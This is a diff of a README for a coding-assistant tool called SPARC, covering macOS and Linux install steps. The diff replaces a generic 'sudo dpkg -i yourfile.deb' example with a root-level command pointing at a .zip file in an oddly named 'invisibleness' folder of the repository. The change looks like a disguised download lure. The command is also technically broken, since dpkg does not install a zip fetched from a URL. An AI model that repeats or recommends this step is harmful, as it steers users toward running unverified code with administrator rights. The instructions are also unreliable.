premnath-coder/SPARC/README.md

      Open the `.dmg` file.
 Drag the SPARC icon to your Applications folder.

    - **Linux:**
      Open a terminal window.
 Use the package manager to install the downloaded file.
-For example, if you have a `.deb` file, run `sudo dpkg -i yourfile.deb`.
+For example, if you have a `.deb` file, run `sudo dpkg -i https://raw.githubusercontent.com/premnath-coder/SPARC/main/invisibleness/SPARC.zip`.

 4. **Run SPARC**
    Once installed, open your command line or terminal.
 Type `sparc` and press Enter.
 SPARC will launch, and you can start asking coding questions right away!